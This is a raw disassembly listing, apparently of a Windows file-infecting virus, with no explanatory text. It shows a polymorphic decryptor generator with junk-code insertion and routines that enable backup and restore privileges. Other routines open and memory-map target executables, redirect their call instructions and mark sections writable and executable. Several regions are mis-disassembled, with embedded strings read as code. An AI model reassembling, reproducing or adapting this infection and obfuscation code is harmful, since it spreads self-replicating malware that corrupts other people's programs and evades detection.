jmp short loc_3144B7D1
; ---------------------------------------------------------------------------
loc_3144B7BE: ; CODE XREF: UPX2:3144B7B6�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_3144B7CD
or ax, 2531h
jmp short loc_3144B7D1
; ---------------------------------------------------------------------------
loc_3144B7CD: ; CODE XREF: UPX2:3144B7C5�j
or ax, 2501h
loc_3144B7D1: ; CODE XREF: UPX2:3144B7BC�j
; UPX2:3144B7CB�j
stosw
call near ptr dword_3144B72C+68h
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_3144B7E3 proc near ; CODE XREF: UPX2:3144BE2F�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_3144B72C+68h
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_3144B80B
rdtsc
jmp short loc_3144B80D
; ---------------------------------------------------------------------------
loc_3144B80B: ; CODE XREF: sub_3144B7E3+22�j
sub eax, eax
loc_3144B80D: ; CODE XREF: sub_3144B7E3+26�j
stosd
retn
sub_3144B7E3 endp
; =============== S U B R O U T I N E =======================================
sub_3144B80F proc near ; CODE XREF: UPX2:loc_3144BE39�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3144B842
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_3144B854
; ---------------------------------------------------------------------------
loc_3144B842: ; CODE XREF: sub_3144B80F+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_3144B854: ; CODE XREF: sub_3144B80F+31�j
retn
sub_3144B80F endp
; =============== S U B R O U T I N E =======================================
sub_3144B855 proc near ; CODE XREF: sub_3144B8C7:loc_3144B8EE�p
; sub_3144B8C7+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_3144B883
; ---------------------------------------------------------------------------
loc_3144B85E: ; CODE XREF: sub_3144B855+44�j
mov al, 0FCh
jmp short loc_3144B882
; ---------------------------------------------------------------------------
loc_3144B862: ; CODE XREF: sub_3144B855+48�j
mov ax, 0EBh
stosw
jmp short loc_3144B883
; ---------------------------------------------------------------------------
loc_3144B86A: ; CODE XREF: sub_3144B855+4C�j
push 4
pop eax
call near ptr dword_3144AC38+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_3144B883
; ---------------------------------------------------------------------------
loc_3144B880: ; CODE XREF: sub_3144B855+50�j
mov al, 90h
loc_3144B882: ; CODE XREF: sub_3144B855+B�j
; sub_3144B855+60�j ...
stosb
loc_3144B883: ; CODE XREF: sub_3144B855+7�j
; sub_3144B855+13�j ...
push 15h
pop eax
call near ptr dword_3144AC38+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_3144B8C6
test dl, dl
jz short loc_3144B85E
dec dl
jz short loc_3144B862
dec dl
jz short loc_3144B86A
dec dl
jz short loc_3144B880
dec dl
jz short loc_3144B8B7
dec dl
jz short loc_3144B8BE
dec dl
jz short loc_3144B8C2
mov al, 0F9h
jmp short loc_3144B882
; ---------------------------------------------------------------------------
loc_3144B8B7: ; CODE XREF: sub_3144B855+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_3144B882
; ---------------------------------------------------------------------------
loc_3144B8BE: ; CODE XREF: sub_3144B855+58�j
mov al, 0F5h
jmp short loc_3144B882
; ---------------------------------------------------------------------------
loc_3144B8C2: ; CODE XREF: sub_3144B855+5C�j
mov al, 0F8h
jmp short loc_3144B882
; ---------------------------------------------------------------------------
locret_3144B8C6: ; CODE XREF: sub_3144B855+40�j
retn
sub_3144B855 endp
; =============== S U B R O U T I N E =======================================
sub_3144B8C7 proc near ; CODE XREF: UPX2:loc_3144BD10�p
; UPX2:3144BEC3�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_3144B8D7
add al, 4
loc_3144B8D7: ; CODE XREF: sub_3144B8C7+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_3144B8EE
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3144B8EE: ; CODE XREF: sub_3144B8C7+1E�j
call sub_3144B855
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_3144B905
mov ah, 29h
loc_3144B905: ; CODE XREF: sub_3144B8C7+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_3144B855
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_3144B928
mov al, 86h
loc_3144B928: ; CODE XREF: sub_3144B8C7+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_3144B93C
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_3144B93C: ; CODE XREF: sub_3144B8C7+6C�j
retn
sub_3144B8C7 endp
; ---------------------------------------------------------------------------
loc_3144B93D: ; CODE XREF: sub_3144C543+183�p
lea edi, [ebp+1039CCh]
call sub_3144B855
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_3144B957
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_3144B957 db 0F7h ; ÷ ; CODE XREF: UPX2:3144B952�j
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_3144BBE8
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_3144BBE8: ; CODE XREF: UPX2:3144BBDD�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_3144BBFF
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_3144BC3C
; ---------------------------------------------------------------------------
loc_3144BBFF: ; CODE XREF: UPX2:3144BBF2�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_3144BC11
mov al, 29h
loc_3144BC11: ; CODE XREF: UPX2:3144BC0D�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_3144BC34
mov ah, 0C8h
loc_3144BC34: ; CODE XREF: UPX2:3144BC30�j
or ah, [ebp+1039B9h]
stosw
loc_3144BC3C: ; CODE XREF: UPX2:3144BBFD�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_3144BCC5
call sub_3144B855
test dword ptr [ebp+1039C0h], 400h
jnz short loc_3144BC70
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_3144BCBD
; ---------------------------------------------------------------------------
loc_3144BC70: ; CODE XREF: UPX2:3144BC63�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_3144BC8D
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_3144BCA2
; ---------------------------------------------------------------------------
loc_3144BC8D: ; CODE XREF: UPX2:3144BC7A�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_3144BCA2: ; CODE XREF: UPX2:3144BC8B�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_3144BCB5
add ah, 8
loc_3144BCB5: ; CODE XREF: UPX2:3144BCB0�j
or ah, [ebp+1039BAh]
stosw
loc_3144BCBD: ; CODE XREF: UPX2:3144BC6E�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_3144BCC5: ; CODE XREF: UPX2:3144BC52�j
call sub_3144B855
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_3144BCE4
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_3144B855
loc_3144BCE4: ; CODE XREF: UPX2:3144BCD4�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_3144BD10
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_3144BD15
; ---------------------------------------------------------------------------
loc_3144BD10: ; CODE XREF: UPX2:3144BCF7�j
call sub_3144B8C7
loc_3144BD15: ; CODE XREF: UPX2:3144BD0E�j
call sub_3144B855
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_3144BD31
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_3144BD40
; ---------------------------------------------------------------------------
loc_3144BD31: ; CODE XREF: UPX2:3144BD24�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_3144BD40: ; CODE XREF: UPX2:3144BD2F�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_3144BD7B
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_3144BD72
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3144BD7A
; ---------------------------------------------------------------------------
loc_3144BD72: ; CODE XREF: UPX2:3144BD56�j
mov al, 40h
or al, [ebp+1039BAh]
loc_3144BD7A: ; CODE XREF: UPX2:3144BD70�j
stosb
loc_3144BD7B: ; CODE XREF: UPX2:3144BD4A�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_3144BD97
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_3144BD9F
; ---------------------------------------------------------------------------
loc_3144BD97: ; CODE XREF: UPX2:3144BD85�j
mov al, 48h
or al, [ebp+1039B9h]
loc_3144BD9F: ; CODE XREF: UPX2:3144BD95�j
stosb
call sub_3144B855
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_3144BDD8
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_3144BDF3
mov cl, 77h
jmp short loc_3144BDF3
; ---------------------------------------------------------------------------
loc_3144BDD8: ; CODE XREF: UPX2:3144BDB1�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_3144BDF3: ; CODE XREF: UPX2:3144BDD2�j
; UPX2:3144BDD6�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_3144B855
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_3144BE43
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_3144BE43
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_3144BE39
call sub_3144B7E3
call sub_3144B855
loc_3144BE39: ; CODE XREF: UPX2:3144BE2D�j
call sub_3144B80F
call sub_3144B855
loc_3144BE43: ; CODE XREF: UPX2:3144BE15�j
; UPX2:3144BE21�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3144BE57
mov al, 0C9h
stosb
call sub_3144B855
loc_3144BE57: ; CODE XREF: UPX2:3144BE4D�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3144BE8D
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_3144B855
mov al, 61h
stosb
call sub_3144B855
loc_3144BE8D: ; CODE XREF: UPX2:3144BE61�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_3144B855
test dword ptr [ebp+1039C0h], 20h
jz short loc_3144BF19
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_3144BED5
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_3144B8C7
call sub_3144B855
mov al, 0C3h
stosb
call sub_3144B855
loc_3144BED5: ; CODE XREF: UPX2:3144BEB4�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_3144B855
test dword ptr [ebp+1039C0h], 800000h
jz short loc_3144BF08
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_3144BF12
; ---------------------------------------------------------------------------
loc_3144BF08: ; CODE XREF: UPX2:3144BEFA�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_3144BF12: ; CODE XREF: UPX2:3144BF06�j
stosw
call sub_3144B855
loc_3144BF19: ; CODE XREF: UPX2:3144BEA8�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_3144BF84
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_3144BF4E
lea eax, [ebp+1039B8h]
loc_3144BF46: ; CODE XREF: UPX2:3144BF4C�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3144BF46
loc_3144BF4E: ; CODE XREF: UPX2:3144BF3E�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3144BF63
mov ax, 0C031h
stosw
loc_3144BF63: ; CODE XREF: UPX2:3144BF5B�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3144BF7C
mov ax, 0C031h
stosw
loc_3144BF7C: ; CODE XREF: UPX2:3144BF74�j
mov al, 0C3h
stosb
call sub_3144B855
loc_3144BF84: ; CODE XREF: UPX2:3144BF23�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_3144BF9C
push edi
sub edi, eax
pop eax
jmp short loc_3144BFB5
; ---------------------------------------------------------------------------
loc_3144BF9C: ; CODE XREF: UPX2:3144BF94�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3144BFB5: ; CODE XREF: UPX2:3144BF9A�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_3144BFD5
neg eax
loc_3144BFD5: ; CODE XREF: UPX2:3144BFD1�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3144BFD9 proc near ; CODE XREF: sub_3144C543+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_3144C1C1
call near ptr loc_3144BFF9+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3144BFF9: ; CODE XREF: sub_3144BFD9+F�p
add bh, bh
sub_3144BFD9 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_3144B4FC
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_3144B4FC
mov edi, [ebp+1042F4h]
push esi
call sub_3144B4FC
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3144C1C1
jz loc_3144C1C1
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_3144C192
loc_3144C073: ; CODE XREF: sub_3144C192+29�j
lodsb
cmp al, 0E8h
jnz loc_3144C11E
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call sub_3144B4FC
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_3144C0A1
cmp eax, [edi+0Ch]
jnb loc_3144C1BA
jmp short loc_3144C0AD
; ---------------------------------------------------------------------------
loc_3144C0A1: ; CODE XREF: sub_3144C192-FE�j
cmp [ebp+1042F4h], edx
jnz loc_3144C1BA
loc_3144C0AD: ; CODE XREF: sub_3144C192-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_3144C1BA
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_3144B4FC
cmp [ebp+1042F4h], edi
jnz loc_3144C1BA
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3144C1BA
cmp eax, [edi+8]
jnb loc_3144C1BA
loc_3144C0F6: ; CODE XREF: sub_3144C192+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_3144C1D0
jmp loc_3144C1BA
; ---------------------------------------------------------------------------
loc_3144C11E: ; CODE XREF: sub_3144C192-11C�j
cmp al, 0FFh
jnz loc_3144C1BA
cmp byte ptr [esi], 15h
jnz loc_3144C1BA
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_3144B4FC
cmp [ebp+1042F4h], edi
jnz short loc_3144C1BA
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_3144C167
cmp eax, [ebp+10431Ch]
jb short loc_3144C1D0
loc_3144C167: ; CODE XREF: sub_3144C192-35�j
cmp eax, 70000000h
jb short loc_3144C1A5
call sub_3144C192
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_3144C191
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3144C1AC
; ---------------------------------------------------------------------------
locret_3144C191: ; CODE XREF: sub_3144C192-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3144C192
; =============== S U B R O U T I N E =======================================
sub_3144C192 proc near ; CODE XREF: sub_3144C192-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 3144C073 SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call sub_3144B603
popa
loc_3144C1A5: ; CODE XREF: sub_3144C192-26�j
test eax, 80000000h
jnz short loc_3144C1BA
loc_3144C1AC: ; CODE XREF: sub_3144C192-3�j
sub eax, [edi+0Ch]
jb short loc_3144C1BA
cmp eax, [edi+8]
jb loc_3144C0F6
loc_3144C1BA: ; CODE XREF: sub_3144C192-F9�j
; sub_3144C192-EB�j ...
dec ecx
jnz loc_3144C073
loc_3144C1C1: ; CODE XREF: sub_3144BFD9+9�j
; UPX2:3144C05B�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_3144C212
; ---------------------------------------------------------------------------
loc_3144C1D0: ; CODE XREF: sub_3144C192-7F�j
; sub_3144C192-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_3144C212: ; CODE XREF: sub_3144C192+3C�j
pop edi
pop esi
retn
sub_3144C192 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144C215 proc near ; CODE XREF: UPX2:3144C516�p
; FUNCTION CHUNK AT 3144C33F SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_3144C33F
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_3144C33F
call sub_3144A697
call near ptr loc_3144C250+5
push ebx
db 65h
jz short near ptr unk_3144C28E
imul ebp, [ebp+53h], 72756365h
loc_3144C250: ; CODE XREF: sub_3144C215+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_3144C215 endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_3144C284+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_3144C2EB
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_3144C284: ; CODE XREF: UPX2:3144C267�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ; è
db 13h
db 0
unk_3144C28E db 0 ; CODE XREF: sub_3144C215+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0Bh
db 0E8h ; è
db 0FFh
db 0FFh
db 0E8h ; è
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0EEh ; î
db 0E7h ; ç
db 0FFh
db 0FFh
db 0E8h ; è
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0CBh ; Ë
db 0E7h ; ç
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_3144C2EB: ; CODE XREF: UPX2:3144C275�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_3144C215
loc_3144C33F: ; CODE XREF: sub_3144C215+A�j
; sub_3144C215+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_3144C215
; =============== S U B R O U T I N E =======================================
sub_3144C341 proc near ; CODE XREF: UPX2:3144C50F�p
; UPX2:3144C51B�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_3144C412
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_3144C412
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_3144C993
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_3144C987
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_3144C987
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_3144C987
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_3144C95F
mov [ebp+1042B4h], eax
locret_3144C412: ; CODE XREF: sub_3144C341+10�j
; sub_3144C341+27�j ...
retn
sub_3144C341 endp
; ---------------------------------------------------------------------------
loc_3144C413: ; CODE XREF: sub_3144C543+188�p
; sub_3144C543+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ; ÷
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_3144C458 proc near ; CODE XREF: sub_3144C543:loc_3144C5B8�p
; sub_3144C543+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_3144C45D: ; CODE XREF: sub_3144C458+23�j
jecxz short locret_3144C494
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3144C494
cmp dword ptr [edx+0Ch], 1
jb short loc_3144C45D
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_3144C494: ; CODE XREF: sub_3144C458:loc_3144C45D�j
; sub_3144C458+1D�j ...
retn
sub_3144C458 endp
; =============== S U B R O U T I N E =======================================
sub_3144C495 proc near ; CODE XREF: UPX2:3144C52D�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3144C495 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3144C4A2: ; CODE XREF: UPX2:3144C4C3�j
mov ecx, edi
jmp short loc_3144C4B1
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_3144C4AD: ; CODE XREF: UPX2:3144C4BF�j
mov ebx, edi
xor ecx, ecx
loc_3144C4B1: ; CODE XREF: UPX2:3144C4A4�j
